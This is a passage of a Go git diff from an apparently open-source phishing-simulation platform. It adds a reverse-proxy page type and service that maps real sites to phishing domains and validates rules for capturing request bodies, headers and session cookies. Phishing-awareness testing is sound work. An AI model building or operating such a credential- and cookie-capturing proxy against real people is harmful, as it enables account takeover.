} + + return true +} + +// GetByProxyID gets domains by proxy ID +func (d *Domain) GetByProxyID( + ctx context.Context, + session *model.Session, + proxyID *uuid.UUID, +) (*model.Result[model.Domain], error) { + ae := NewAuditEvent("Domain.GetByProxyID", session) + ae.Details["proxyID"] = proxyID.String() + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + d.LogAuthError(err) + return nil, err + } + if !isAuthorized { + d.AuditLogNotAuthorized(ae) + return nil, errs.ErrAuthorizationFailed + } + result, err := d.DomainRepository.GetByProxyID( + ctx, + proxyID, + &repository.DomainOption{}, + ) + if err != nil { + d.Logger.Errorw("failed to get domains by proxy id", "error", err) + return nil, errs.Wrap(err) + } + // no audit on read + return result, nil +} diff --git a/backend/service/page.go b/backend/service/page.go index ff7b98c..0464a1c 100644 --- a/backend/service/page.go +++ b/backend/service/page.go @@ -2,8 +2,12 @@ package service import ( "context" + "net/url" + "regexp" + "strings" "github.com/go-errors/errors" + "gopkg.in/yaml.v3" "github.com/google/uuid" "github.com/phishingclub/phishingclub/data" @@ -11,6 +15,7 @@ import ( "github.com/phishingclub/phishingclub/model" "github.com/phishingclub/phishingclub/repository" "github.com/phishingclub/phishingclub/validate" + "github.com/phishingclub/phishingclub/vo" "gorm.io/gorm" ) @@ -21,6 +26,40 @@ type Page struct { CampaignRepository *repository.Campaign CampaignTemplateService *CampaignTemplate TemplateService *Template + DomainRepository *repository.Domain +} + +// ProxyConfig represents the YAML configuration for proxy pages +type ProxyConfig struct { + Default map[string]interface{} `yaml:"default,omitempty"` + Hosts map[string]ProxyHostConfig `yaml:",inline"` +} + +// ProxyHostConfig represents configuration for a specific host +type ProxyHostConfig struct { + Proxy string `yaml:"proxy,omitempty"` + Domain string `yaml:"domain,omitempty"` + Capture []ProxyCaptureRule `yaml:"capture,omitempty"` + Replace []ProxyReplaceRule `yaml:"replace,omitempty"` +} + +// ProxyCaptureRule represents a capture rule +type ProxyCaptureRule struct { + Name string `yaml:"name"` + Method string `yaml:"method,omitempty"` + Path string `yaml:"path,omitempty"` + Pattern string `yaml:"pattern,omitempty"` + Find string `yaml:"find"` + From string `yaml:"from,omitempty"` + Required *bool `yaml:"required,omitempty"` +} + +// ProxyReplaceRule represents a replace rule +type ProxyReplaceRule struct { + Name string `yaml:"name"` + Find string `yaml:"find"` + Replace string `yaml:"replace"` + From string `yaml:"from,omitempty"` } // Create creates a new page @@ -50,11 +89,20 @@ func (p *Page) Create( p.Logger.Errorw("failed to validate page", "error", err) return nil, errs.Wrap(err) } - // validate template content if present - if content, err := page.Content.Get(); err == nil { - if err := p.TemplateService.ValidatePageTemplate(content.String()); err != nil { - p.Logger.Errorw("failed to validate page template", "error", err) - return nil, validate.WrapErrorWithField(errors.New("invalid template: "+err.Error()), "content") + // validate based on page type + pageType, _ := page.Type.Get() + if pageType.String() == "proxy" { + // validate proxy configuration + if err := p.validateProxyPage(ctx, page); err != nil { + return nil, err + } + } else { + // validate template content for regular pages + if content, err := page.Content.Get(); err == nil { + if err := p.TemplateService.ValidatePageTemplate(content.String()); err != nil { + p.Logger.Errorw("failed to validate page template", "error", err) + return nil, validate.WrapErrorWithField(errors.New("invalid template: "+err.Error()), "content") + } } } // check uniqueness @@ -260,14 +308,35 @@ func (p *Page) UpdateByID( } current.Name.Set(v) } + if v, err := page.Type.Get(); err == nil { + current.Type.Set(v) + } + if v, err := page.TargetURL.Get(); err == nil { + current.TargetURL.Set(v) + } + if v, err := page.ProxyConfig.Get(); err == nil { + current.ProxyConfig.Set(v) + } if v, err := page.Content.Get(); err == nil { - // validate template content before updating - if err := p.TemplateService.ValidatePageTemplate(v.String()); err != nil { - p.Logger.Errorw("failed to validate page template", "error", err) - return validate.WrapErrorWithField(errors.New("invalid template: "+err.Error()), "content") - } current.Content.Set(v) } + + // validate based on updated page type + updatedPageType, _ := current.Type.Get() + if updatedPageType.String() == "proxy" { + // validate proxy configuration + if err := p.validateProxyPage(ctx, current); err != nil { + return err + } + } else { + // validate template content for regular pages + if content, err := current.Content.Get(); err == nil { + if err := p.TemplateService.ValidatePageTemplate(content.String()); err != nil { + p.Logger.Errorw("failed to validate page template", "error", err) + return validate.WrapErrorWithField(errors.New("invalid template: "+err.Error()), "content") + } + } + } // update page err = p.PageRepository.UpdateByID( ctx, @@ -284,6 +353,121 @@ func (p *Page) UpdateByID( return nil } +// validateProxyPage validates proxy page configuration +func (p *Page) validateProxyPage(ctx context.Context, page *model.Page) error { + // validate target URL format + targetURL, err := page.TargetURL.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("target URL is required for proxy pages"), "targetURL") + } + + parsedURL, err := url.Parse(targetURL.String()) + if err != nil || parsedURL.Scheme == "" || parsedURL.Host == "" { + return validate.WrapErrorWithField(errors.New("invalid target URL format - must be a valid HTTP or HTTPS URL"), "targetURL") + } + + if parsedURL.Scheme != "http" && parsedURL.Scheme != "https" { + return validate.WrapErrorWithField(errors.New("target URL must use HTTP or HTTPS protocol"), "targetURL") + } + + // validate proxy configuration YAML + proxyConfig, err := page.ProxyConfig.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("proxy configuration is required for proxy pages"), "proxyConfig") + } + + var config ProxyConfig + if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return validate.WrapErrorWithField(errors.New("invalid YAML format: "+err.Error()), "proxyConfig") + } + + // validate that all referenced domains in the config support proxy + for hostname, hostConfig := range config.Hosts { + if hostConfig.Domain != "" { + domainName, err := vo.NewString255(hostConfig.Domain) + if err != nil { + return validate.WrapErrorWithField( + errors.New("invalid domain name format"), + "proxyConfig", + ) + } + + _, err = p.DomainRepository.GetByName(ctx, domainName, &repository.DomainOption{}) + if err != nil { + if errors.Is(err, gorm.ErrRecordNotFound) { + return validate.WrapErrorWithField( + errors.New("referenced domain '"+hostConfig.Domain+"' not found"), + "proxyConfig", + ) + } + return err + } + } + + // validate capture rules + for _, capture := range hostConfig.Capture { + if capture.Name == "" { + return validate.WrapErrorWithField(errors.New("capture rule name is required"), "proxyConfig") + } + if capture.Pattern == "" && capture.Path == "" { + return validate.WrapErrorWithField( + errors.New("capture rule must have either pattern or path"), + "proxyConfig", + ) + } + if capture.Pattern != "" { + if _, err := regexp.Compile(capture.Pattern); err != nil { + return validate.WrapErrorWithField( + errors.New("invalid regex pattern in capture rule: "+err.Error()), + "proxyConfig", + ) + } + } + if capture.Path != "" { + if _, err := regexp.Compile(capture.Path); err != nil { + return validate.WrapErrorWithField( + errors.New("invalid regex pattern for path in capture rule: "+err.Error()), + "proxyConfig", + ) + } + } + if capture.From != "" { + validFromValues := []string{"request_body", "request_header", "response_body", "response_header", "any"} + valid := false + for _, validFrom := range validFromValues { + if capture.From == validFrom { + valid = true + break + } + } + if !valid { + return validate.WrapErrorWithField( + errors.New("invalid 'from' value in capture rule, must be one of: "+strings.Join(validFromValues, ", ")), + "proxyConfig", + ) + } + } + } + + // validate replace rules + for _, replace := range hostConfig.Replace { + if replace.Find == "" { + return validate.WrapErrorWithField(errors.New("replace rule 'find' is required"), "proxyConfig") + } + if _, err := regexp.Compile(replace.Find); err != nil { + return validate.WrapErrorWithField( + errors.New("invalid regex pattern in replace rule 'find': "+err.Error()), + "proxyConfig", + ) + } + } + + p.Logger.Debugw("validated proxy host config", "hostname", hostname) + } + + return nil +} + // DeleteByID deletes a page by ID func (p *Page) DeleteByID( ctx context.Context, diff --git a/backend/service/proxy.go b/backend/service/proxy.go new file mode 100644 index 0000000..8769d90 --- /dev/null +++ b/backend/service/proxy.go @@ -0,0 +1,1762 @@ +package service + +import ( + "context" + "fmt" + "net/url" + "regexp" + "strings" + + "github.com/go-errors/errors" + "github.com/oapi-codegen/nullable" + "gopkg.in/yaml.v3" + + "github.com/google/uuid" + "github.com/phishingclub/phishingclub/data" + "github.com/phishingclub/phishingclub/errs" + "github.com/phishingclub/phishingclub/model" + "github.com/phishingclub/phishingclub/repository" + "github.com/phishingclub/phishingclub/validate" + "github.com/phishingclub/phishingclub/vo" + "gorm.io/gorm" +) + +// Proxy is a Proxy service +type Proxy struct { + Common + ProxyRepository *repository.Proxy + DomainRepository *repository.Domain + CampaignRepository *repository.Campaign + CampaignTemplateService *CampaignTemplate + DomainService *Domain +} + +// ProxyServiceConfig represents the YAML configuration for proxy +type ProxyServiceConfig struct { + Proxy string `yaml:"proxy,omitempty"` + Global *ProxyServiceRules `yaml:"global,omitempty"` +} + +// ProxyServiceDomainConfig represents configuration for a specific domain mapping +type ProxyServiceDomainConfig struct { + To string `yaml:"to"` + Capture []ProxyServiceCaptureRule `yaml:"capture,omitempty"` + Rewrite []ProxyServiceReplaceRule `yaml:"rewrite,omitempty"` +} + +// ProxyServiceRules represents capture and replace rules +// ProxyServiceRules represents global rules that apply to all hosts +type ProxyServiceRules struct { + Capture []ProxyServiceCaptureRule `yaml:"capture,omitempty"` + Rewrite []ProxyServiceReplaceRule `yaml:"rewrite,omitempty"` +} + +// CompilePathPatterns compiles regex patterns for all capture rules +func CompilePathPatterns(config *ProxyServiceConfigYAML) error { + // Compile global capture rule patterns + if config.Global != nil { + for i := range config.Global.Capture { + if err := compileCapturePath(&config.Global.Capture[i]); err != nil { + return err + } + } + } + + // Compile host-specific capture rule patterns + for _, hostConfig := range config.Hosts { + if hostConfig != nil { + for i := range hostConfig.Capture { + if err := compileCapturePath(&hostConfig.Capture[i]); err != nil { + return err + } + } + } + } + return nil +} + +// compileCapturePath compiles the path pattern for a capture rule +func compileCapturePath(rule *ProxyServiceCaptureRule) error { + if rule.Path != "" { + pathRe, err := regexp.Compile(rule.Path) + if err != nil { + return fmt.Errorf("invalid regex pattern for path '%s': %w", rule.Path, err) + } + rule.PathRe = pathRe + } + return nil +} + +// ProxyServiceCaptureRule represents a capture rule +type ProxyServiceCaptureRule struct { + Name string `yaml:"name"` + Method string `yaml:"method,omitempty"` + Path string `yaml:"path,omitempty"` + Find string `yaml:"find,omitempty"` + From string `yaml:"from,omitempty"` + Required *bool `yaml:"required,omitempty"` + PathRe *regexp.Regexp `yaml:"-"` // compiled regex for path matching +} + +// ProxyServiceReplaceRule represents a replacement rule +type ProxyServiceReplaceRule struct { + Name string `yaml:"name,omitempty"` + Find string `yaml:"find"` + Replace string `yaml:"replace"` + From string `yaml:"from,omitempty"` +} + +// ProxyServiceConfigYAML represents the complete YAML configuration structure that matches the actual YAML format +type ProxyServiceConfigYAML struct { + Version string `yaml:"version,omitempty"` + Proxy string `yaml:"proxy,omitempty"` + Global *ProxyServiceRules `yaml:"global,omitempty"` + Hosts map[string]*ProxyServiceDomainConfig `yaml:",inline"` // inline allows domain names as top-level keys +} + +// ValidateVersion validates that the version is supported +func ValidateVersion(config *ProxyServiceConfigYAML) error { + if config.Version != "0.0" { + return errors.New("only version 0.0 is supported") + } + return nil +} + +// Create creates a new Proxy +func (m *Proxy) Create( + ctx context.Context, + session *model.Session, + proxy *model.Proxy, +) (*uuid.UUID, error) { + ae := NewAuditEvent("Proxy.Create", session) + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + m.LogAuthError(err) + return nil, errs.Wrap(err) + } + if !isAuthorized { + m.AuditLogNotAuthorized(ae) + return nil, errs.ErrAuthorizationFailed + } + var companyID *uuid.UUID + if cid, err := proxy.CompanyID.Get(); err == nil { + companyID = &cid + } + + // validate data + if err := proxy.Validate(); err != nil { + m.Logger.Errorw("failed to validate proxy", "error", err) + return nil, errs.Wrap(err) + } + + // validate Proxy configuration + if err := m.validateProxyConfig(ctx, proxy); err != nil { + return nil, err + } + + // check uniqueness + name := proxy.Name.MustGet() + isOK, err := repository.CheckNameIsUnique( + ctx, + m.ProxyRepository.DB, + "proxies", + name.String(), + companyID, + nil, + ) + if err != nil { + m.Logger.Errorw("failed to check proxy uniqueness", "error", err) + return nil, errs.Wrap(err) + } + if !isOK { + m.Logger.Debugw("proxy name is already taken", "name", name.String()) + return nil, validate.WrapErrorWithField(errors.New("is not unique"), "name") + } + + // create proxy + id, err := m.ProxyRepository.Insert( + ctx, + proxy, + ) + if err != nil { + m.Logger.Errorw("failed to create proxy", "error", err) + return nil, errs.Wrap(err) + } + + // create associated domains + err = m.createProxyDomains(ctx, session, id, proxy) + if err != nil { + // rollback proxy creation + m.ProxyRepository.DeleteByID(ctx, id) + m.Logger.Errorw("failed to create proxy domains", "error", err) + return nil, errs.Wrap(err) + } + + ae.Details["id"] = id.String() + m.AuditLogAuthorized(ae) + + return id, nil +} + +// GetAll gets proxies +func (m *Proxy) GetAll( + ctx context.Context, + session *model.Session, + companyID *uuid.UUID, + options *repository.ProxyOption, +) (*model.Result[model.Proxy], error) { + result := model.NewEmptyResult[model.Proxy]() + ae := NewAuditEvent("Proxy.GetAll", session) + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + m.LogAuthError(err) + return result, errs.Wrap(err) + } + if !isAuthorized { + m.AuditLogNotAuthorized(ae) + return result, errs.ErrAuthorizationFailed + } + result, err = m.ProxyRepository.GetAll( + ctx, + companyID, + options, + ) + if err != nil { + m.Logger.Errorw("failed to get proxies", "error", err) + return result, errs.Wrap(err) + } + // no audit log on read + return result, nil +} + +// GetAllOverview gets proxies with limited data +func (m *Proxy) GetAllOverview( + companyID *uuid.UUID, // can be null + ctx context.Context, + session *model.Session, + queryArgs *vo.QueryArgs, +) (*model.Result[model.ProxyOverview], error) { + result := model.NewEmptyResult[model.ProxyOverview]() + ae := NewAuditEvent("Proxy.GetAllOverview", session) + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + m.LogAuthError(err) + return result, errs.Wrap(err) + } + if !isAuthorized { + m.AuditLogNotAuthorized(ae) + return result, errs.ErrAuthorizationFailed + } + // get proxies + result, err = m.ProxyRepository.GetAllSubset( + ctx, + companyID, + &repository.ProxyOption{ + QueryArgs: queryArgs, + }, + ) + if err != nil { + m.Logger.Errorw("failed to get proxies subset", "error", err) + return result, errs.Wrap(err) + } + // no audit log on read + return result, nil +} + +// GetByID gets a Proxy by ID +func (m *Proxy) GetByID( + ctx context.Context, + session *model.Session, + id *uuid.UUID, + options *repository.ProxyOption, +) (*model.Proxy, error) { + ae := NewAuditEvent("Proxy.GetByID", session) + ae.Details["id"] = id.String() + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + m.LogAuthError(err) + return nil, errs.Wrap(err) + } + if !isAuthorized { + m.AuditLogNotAuthorized(ae) + return nil, errs.ErrAuthorizationFailed + } + // get proxy + proxy, err := m.ProxyRepository.GetByID( + ctx, + id, + options, + ) + if errors.Is(err, gorm.ErrRecordNotFound) { + // return early this is not a an error + return nil, errs.Wrap(err) + } + if err != nil { + m.Logger.Errorw("failed to get proxy by ID", "error", err) + return nil, errs.Wrap(err) + } + + // apply defaults to Proxy configuration for display + if err := m.applyConfigurationDefaults(proxy); err != nil { + m.Logger.Errorw("failed to apply configuration defaults", "error", err) + // don't fail the request, just log the error + } + + // no audit log on read + return proxy, nil +} + +// UpdateByID updates a Proxy by ID +func (m *Proxy) UpdateByID( + ctx context.Context, + session *model.Session, + id *uuid.UUID, + proxy *model.Proxy, +) error { + ae := NewAuditEvent("Proxy.UpdateByID", session) + ae.Details["id"] = id.String() + // check permissions + isAuthorized, err := IsAuthorized(session, data.PERMISSION_ALLOW_GLOBAL) + if err != nil && !errors.Is(err, errs.ErrAuthorizationFailed) { + m.LogAuthError(err) + return err + } + if !isAuthorized { + m.AuditLogNotAuthorized(ae) + return errs.ErrAuthorizationFailed + } + // get current + current, err := m.ProxyRepository.GetByID( + ctx, + id, + &repository.ProxyOption{}, + ) + if errors.Is(err, gorm.ErrRecordNotFound) { + m.Logger.Debugw("failed to update proxy by ID", "error", err) + return err + } + if err != nil { + m.Logger.Errorw("failed to update proxy by ID", "error", err) + return err + } + // update proxy - if a field is present and not null, update it + if v, err := proxy.Name.Get(); err == nil { + // check uniqueness + var companyID *uuid.UUID + if cid, err := current.CompanyID.Get(); err == nil { + companyID = &cid + } + name := proxy.Name.MustGet() + isOK, err := repository.CheckNameIsUnique( + ctx, + m.ProxyRepository.DB, + "proxies", + name.String(), + companyID, + id, + ) + if err != nil { + m.Logger.Errorw("failed to check proxy uniqueness", "error", err) + return err + } + if !isOK { + m.Logger.Debugw("proxy name is already taken", "name", name.String()) + return validate.WrapErrorWithField(errors.New("is not unique"), "name") + } + current.Name.Set(v) + } + if v, err := proxy.Description.Get(); err == nil { + current.Description.Set(v) + } + if v, err := proxy.StartURL.Get(); err == nil { + current.StartURL.Set(v) + } + if v, err := proxy.ProxyConfig.Get(); err == nil { + current.ProxyConfig.Set(v) + } + + // validate updated Proxy configuration + if err := m.validateProxyConfigForUpdate(ctx, current, id); err != nil { + return err + } + + // update proxy + err = m.ProxyRepository.UpdateByID( + ctx, + id, + current, + ) + if err != nil { + m.Logger.Errorw("failed to update proxy by ID", "error", err) + return err + } + + // update associated domains + err = m.syncProxyDomains(ctx, session, id, current) + if err != nil { + m.Logger.Errorw("failed to sync proxy domains", "error", err) + return err + } + + ae.Details["id"] = id.String() + m.AuditLogAuthorized(ae) + + return nil +} + +// validateProxyConfigForUpdate validates Proxy configuration during update, allowing same domains for same proxy +func (m *Proxy) validateProxyConfigForUpdate(ctx context.Context, proxy *model.Proxy, proxyID *uuid.UUID) error { + // validate Proxy configuration YAML + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("Proxy configuration is required"), "proxyConfig") + } + + // parse complete YAML structure + var config ProxyServiceConfigYAML + if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return validate.WrapErrorWithField(errors.New("invalid YAML format: "+err.Error()), "proxyConfig") + } + + // set default values + m.setProxyConfigDefaults(&config) + + // validate version (after defaults are applied) + if err := ValidateVersion(&config); err != nil { + return validate.WrapErrorWithField(err, "proxyConfig") + } + + // validate that at least one domain mapping exists + if len(config.Hosts) == 0 { + return validate.WrapErrorWithField(errors.New("at least one domain mapping must be specified"), "proxyConfig") + } + + // validate global uniqueness of capture names across all domains and global rules + if err := m.validateGlobalCaptureNameUniqueness(&config); err != nil { + return err + } + + // ensure that the start URL domain is mentioned in the domain mappings + startURL, err := proxy.StartURL.Get() + if err == nil { + startURLStr := startURL.String() + var startDomain string + + // extract domain from start URL + if strings.Contains(startURLStr, "://") { + // full URL like https://auth.example.com/login + parts := strings.Split(startURLStr, "://") + if len(parts) > 1 { + domainParts := strings.Split(parts[1], "/") + startDomain = domainParts[0] + } + } else if strings.Contains(startURLStr, "/") { + // domain/path format like auth.example.com/login + parts := strings.Split(startURLStr, "/") + startDomain = parts[0] + } else { + // just domain like auth.example.com + startDomain = startURLStr + } + + // check if start domain is in the domain mappings + if startDomain != "" { + found := false + for originalDomain := range config.Hosts { + if originalDomain == startDomain { + found = true + break + } + } + if !found { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("start URL domain '%s' must be included in domain mappings", startDomain)), + "proxyConfig", + ) + } + } + } + + // validate each domain mapping + for originalDomain, domainConfig := range config.Hosts { + if domainConfig == nil { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("domain config for '%s' is nil", originalDomain)), + "proxyConfig", + ) + } + + // validate that 'to' is specified + if domainConfig.To == "" { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("'to' field is required for domain '%s'", originalDomain)), + "proxyConfig", + ) + } + + // validate domain-specific capture rules + if err := m.validateCaptureRules(domainConfig.Capture); err != nil { + return err + } + + // validate domain-specific rewrite rules + if err := m.validateReplaceRules(domainConfig.Rewrite); err != nil { + return err + } + + // note: domain uniqueness validation is skipped during updates + // the syncProxyDomains method will handle domain management properly + } + + // validate global capture and rewrite rules + if config.Global != nil { + if err := m.validateCaptureRules(config.Global.Capture); err != nil { + return err + } + if err := m.validateReplaceRules(config.Global.Rewrite); err != nil { + return err + } + } + + return nil +} + +// validateCaptureRules validates a slice of capture rules +func (m *Proxy) validateCaptureRules(captureRules []ProxyServiceCaptureRule) error { + // track capture names to prevent duplicates + captureNames := make(map[string]bool) + + for _, capture := range captureRules { + if capture.Name == "" { + return validate.WrapErrorWithField(errors.New("capture rule name is required"), "proxyConfig") + } + + // check for duplicate capture names + if captureNames[capture.Name] { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("duplicate capture rule name '%s' found - each capture rule must have a unique name", capture.Name)), + "proxyConfig", + ) + } + captureNames[capture.Name] = true + + if capture.Path == "" { + return validate.WrapErrorWithField(errors.New("capture rule path is required"), "proxyConfig") + } + + // allow empty find pattern for any method path-based navigation tracking + isNavigationTracking := capture.Path != "" && capture.Find == "" + + if capture.Find == "" && !isNavigationTracking { + return validate.WrapErrorWithField( + errors.New("capture rule must have a find pattern, except for path-based navigation tracking"), + "proxyConfig", + ) + } + + if capture.Find != "" { + // for cookie captures, find field contains cookie name (literal string) + // for other captures, find field contains regex pattern + if capture.From != "cookie" { + if _, err := regexp.Compile(capture.Find); err != nil { + return validate.WrapErrorWithField( + errors.New("invalid regex pattern in capture rule: "+err.Error()), + "proxyConfig", + ) + } + } + } + + // 'from' field defaults to 'any' if not specified (handled in setProxyConfigDefaults) + // validate 'from' field if specified + if capture.From != "" { + validFromValues := []string{"request_body", "request_header", "response_body", "response_header", "cookie", "any"} + valid := false + for _, validFrom := range validFromValues { + if capture.From == validFrom { + valid = true + break + } + } + if !valid { + return validate.WrapErrorWithField( + errors.New("invalid 'from' value in capture rule, must be one of: "+strings.Join(validFromValues, ", ")), + "proxyConfig", + ) + } + } + + // validate cookie-specific rules + if capture.From == "cookie" { + if capture.Find == "" { + return validate.WrapErrorWithField( + errors.New("capture rule with from='cookie' must specify cookie name in 'find' field"), + "proxyConfig", + ) + } + + // validate cookie name format (basic validation) + cookieName := capture.Find + if len(cookieName) == 0 { + return validate.WrapErrorWithField( + errors.New("cookie name cannot be empty"), + "proxyConfig", + ) + } + + // cookie names cannot contain certain characters + invalidChars := []string{" ", "\t", "\n", "\r", "=", ";", ","} + for _, char := range invalidChars { + if strings.Contains(cookieName, char) { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("cookie name '%s' contains invalid character '%s'", cookieName, char)), + "proxyConfig", + ) + } + } + + // method should be specified for cookie captures + if capture.Method == "" { + return validate.WrapErrorWithField( + errors.New("capture rule with from='cookie' should specify HTTP method"), + "proxyConfig", + ) + } + } + } + return nil +} + +// setProxyConfigDefaults sets default values for Proxy configuration after YAML parsing +func (m *Proxy) setProxyConfigDefaults(config *ProxyServiceConfigYAML) { + // set default version to 0.0 if not specified + if config.Version == "" { + config.Version = "0.0" + } + + for domain, domainConfig := range config.Hosts { + for i := range domainConfig.Capture { + // set default required to true if not specified + if domainConfig.Capture[i].Required == nil { + trueValue := true + domainConfig.Capture[i].Required = &trueValue + } + // set default 'from' to 'any' if not specified + if domainConfig.Capture[i].From == "" { + domainConfig.Capture[i].From = "any" + } + } + config.Hosts[domain] = domainConfig + } + + // set defaults for global capture rules + if config.Global != nil { + for i := range config.Global.Capture { + // set default required to true if not specified + if config.Global.Capture[i].Required == nil { + trueValue := true + config.Global.Capture[i].Required = &trueValue + } + // set default 'from' to 'any' if not specified + if config.Global.Capture[i].From == "" { + config.Global.Capture[i].From = "any" + } + } + } +} + +// validateReplaceRules validates a slice of replace rules +func (m *Proxy) validateReplaceRules(replaceRules []ProxyServiceReplaceRule) error { + for _, replace := range replaceRules { + if replace.Find == "" { + return validate.WrapErrorWithField(errors.New("replace rule 'find' is required"), "proxyConfig") + } + if _, err := regexp.Compile(replace.Find); err != nil { + return validate.WrapErrorWithField( + errors.New("invalid regex pattern in replace rule 'find': "+err.Error()), + "proxyConfig", + ) + } + if replace.From != "" { + validFromValues := []string{"request_body", "request_header", "response_body", "response_header", "any"} + valid := false + for _, validFrom := range validFromValues { + if replace.From == validFrom { + valid = true + break + } + } + if !valid { + return validate.WrapErrorWithField( + errors.New("invalid 'from' value in replace rule, must be one of: "+strings.Join(validFromValues, ", ")), + "proxyConfig", + ) + } + } + } + return nil +} + +// validateProxyConfig validates Proxy configuration +func (m *Proxy) validateProxyConfig(ctx context.Context, proxy *model.Proxy) error { + // validate Proxy configuration YAML + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return validate.WrapErrorWithField(errors.New("Proxy configuration is required"), "proxyConfig") + } + + // parse complete YAML structure + var config ProxyServiceConfigYAML + if err := yaml.Unmarshal([]byte(proxyConfig.String()), &config); err != nil { + return validate.WrapErrorWithField(errors.New("invalid YAML format: "+err.Error()), "proxyConfig") + } + + // set default values + m.setProxyConfigDefaults(&config) + + // validate version (after defaults are applied) + if err := ValidateVersion(&config); err != nil { + return validate.WrapErrorWithField(err, "proxyConfig") + } + + // validate that at least one domain mapping exists + if len(config.Hosts) == 0 { + return validate.WrapErrorWithField(errors.New("at least one domain mapping must be specified"), "proxyConfig") + } + + // validate global uniqueness of capture names across all domains and global rules + if err := m.validateGlobalCaptureNameUniqueness(&config); err != nil { + return err + } + + // ensure that the start URL domain is mentioned in the domain mappings + startURL, err := proxy.StartURL.Get() + if err == nil { + startURLStr := startURL.String() + var startDomain string + + // extract domain from start URL + if strings.Contains(startURLStr, "://") { + // full URL like https://auth.example.com/login + parts := strings.Split(startURLStr, "://") + if len(parts) > 1 { + domainParts := strings.Split(parts[1], "/") + startDomain = domainParts[0] + } + } else if strings.Contains(startURLStr, "/") { + // domain/path format like auth.example.com/login + parts := strings.Split(startURLStr, "/") + startDomain = parts[0] + } else { + // just domain like auth.example.com + startDomain = startURLStr + } + + // check if start domain is in the domain mappings + if startDomain != "" { + found := false + for originalDomain := range config.Hosts { + if originalDomain == startDomain { + found = true + break + } + } + if !found { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("start URL domain '%s' must be included in domain mappings", startDomain)), + "proxyConfig", + ) + } + } + } + + // validate each domain mapping + for originalDomain, domainConfig := range config.Hosts { + if domainConfig == nil { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("domain config for '%s' is nil", originalDomain)), + "proxyConfig", + ) + } + + // validate that 'to' is specified + if domainConfig.To == "" { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("'to' field is required for domain mapping '%s'", originalDomain)), + "proxyConfig", + ) + } + + // validate that phishing domain doesn't already exist (unless it's managed by this proxy) + phishingDomainVO, err := vo.NewString255(domainConfig.To) + if err != nil { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("invalid phishing domain format: %s", domainConfig.To)), + "proxyConfig", + ) + } + + existingDomain, err := m.DomainRepository.GetByName(ctx, phishingDomainVO, &repository.DomainOption{}) + if err != nil && !errors.Is(err, gorm.ErrRecordNotFound) { + return err + } + if existingDomain != nil { + // check if this domain is managed by a different proxy or is a regular domain + if existingDomain.Type.MustGet().String() != "proxy" { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("domain '%s' already exists as a regular domain", domainConfig.To)), + "proxyConfig", + ) + } else { + // it's a proxy domain, check if it belongs to a different proxy + existingTarget, err := existingDomain.ProxyTargetDomain.Get() + if err == nil { + startURL, err := proxy.StartURL.Get() + if err == nil { + // extract domain from start URL for comparison + startURLParsed, err := url.Parse(startURL.String()) + if err == nil && existingTarget.String() != startURLParsed.Host { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("phishing domain '%s' is already used by another Proxy configuration", domainConfig.To)), + "proxyConfig", + ) + } + } + } + } + } + + // validate domain-specific capture rules + if err := m.validateCaptureRules(domainConfig.Capture); err != nil { + return err + } + + // validate domain-specific rewrite rules + if err := m.validateReplaceRules(domainConfig.Rewrite); err != nil { + return err + } + + // validate that phishing domain is not used by another proxy + if err := m.validatePhishingDomainUniquenessByStartURL(ctx, domainConfig.To, proxy.StartURL.MustGet().String()); err != nil { + return err + } + } + + // validate global capture and rewrite rules + if config.Global != nil { + if err := m.validateCaptureRules(config.Global.Capture); err != nil { + return err + } + if err := m.validateReplaceRules(config.Global.Rewrite); err != nil { + return err + } + } + + return nil +} + +// validateGlobalCaptureNameUniqueness ensures all capture rule names are unique across the entire Proxy configuration +func (m *Proxy) validateGlobalCaptureNameUniqueness(config *ProxyServiceConfigYAML) error { + allCaptureNames := make(map[string]string) // name -> location + + // collect all capture names from domain-specific rules + for domain, domainConfig := range config.Hosts { + for _, capture := range domainConfig.Capture { + if capture.Name == "" { + continue // this will be caught by other validation + } + + if existingLocation, exists := allCaptureNames[capture.Name]; exists { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("duplicate capture rule name '%s' found in domain '%s' - already used in %s", capture.Name, domain, existingLocation)), + "proxyConfig", + ) + } + allCaptureNames[capture.Name] = fmt.Sprintf("domain '%s'", domain) + } + } + + // collect all capture names from global rules + if config.Global != nil { + for _, capture := range config.Global.Capture { + if capture.Name == "" { + continue // this will be caught by other validation + } + + if existingLocation, exists := allCaptureNames[capture.Name]; exists { + return validate.WrapErrorWithField( + errors.New(fmt.Sprintf("duplicate capture rule name '%s' found in global rules - already used in %s", capture.Name, existingLocation)), + "proxyConfig", + ) + } + allCaptureNames[capture.Name] = "global rules" + } + } + + return nil +} + +// applyConfigurationDefaults applies default values to Proxy configuration for display +func (m *Proxy) applyConfigurationDefaults(proxy *model.Proxy) error { + proxyConfig, err := proxy.ProxyConfig.Get() + if err != nil { + return err + } + + // parse complete YAML structure + var config ProxyServiceConfigYAML + 